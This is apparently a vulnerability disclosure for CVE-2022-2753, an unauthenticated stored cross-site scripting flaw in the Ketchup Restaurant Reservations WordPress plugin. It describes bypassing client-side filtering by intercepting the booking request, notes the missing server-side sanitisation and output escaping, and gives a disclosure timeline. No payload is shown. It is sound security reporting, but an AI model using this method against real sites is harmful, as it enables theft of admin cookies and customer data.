Ketchup Restaurant Reservations is a WordPress plugin that provides a restaurant reservation system, where users can make and edit reservations. The admin of the website where the plugin is installed can look at overviews of reservations made. Ketchup Restaurant Reservations version 1.0.0 and earlier contains an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability.
How the vulnerability works
Let’s have a bite of this snack! How does this vulnerability work? The plugin provides users the functionality to book a reservation for the restaurant. A user just has to visit the reservation page; it looks like this.
The reservation form contains client-side filtering, blocking user input that contains special characters. However, this can be circumvented by filling in the form as expected by the code and submitting it but intercepting the request. Next, we modify the user input and send the POST request to the website.
When the data is received by the website, the POST request is processed and inserted into the database. As can be seen in the code below. The code shows data is not sanitized or validated before being inserted. This means the strings we submit through the form for the variables
PHONE_NUMBER will be saved to the database without changes.
Phone Number fields.
When the bookings page is loaded from the WP admin dashboard. The PHP code gets all bookings from the database by calling the
getEverything(). Below you can see how the variables are set with the data we submitted.
Below you can see how the user input from our malicious booking is parsed to the HTML and loaded into the bookings page.
This makes it possible for malicious attackers to for example steal information about customers that made reservations, steal cookies, or other sensitive data.
Proof of Concept
The vulnerability exists because the reservation form does not sanitize and validate user input server side, therefore malicious code can be saved to the database. In addition, the ‘Comment’ field string that is saved in the database is loaded into the webpage without special characters (such as <, >, &, “, and ‘) being converted to HTML entities, which leads to the code being loaded into the webpage. Therefore, the code will be loaded and executed into the webpage where made reservations are listed.
07 August, 2022: WPScan – Vulnerability submitted
10 August, 2022: WPScan – Vendor contacted
29 August, 2022: WPScan – Escalated to WordPress
30 August, 2022: WPScan – Waiting for patch
07 September, 2022: WPScan – No known fix, plugin is closed
07 September, 2022: Disclosure on WPScan and CVE-2022-2753 assigned
20 September, 2022: Proof of Concept disclosure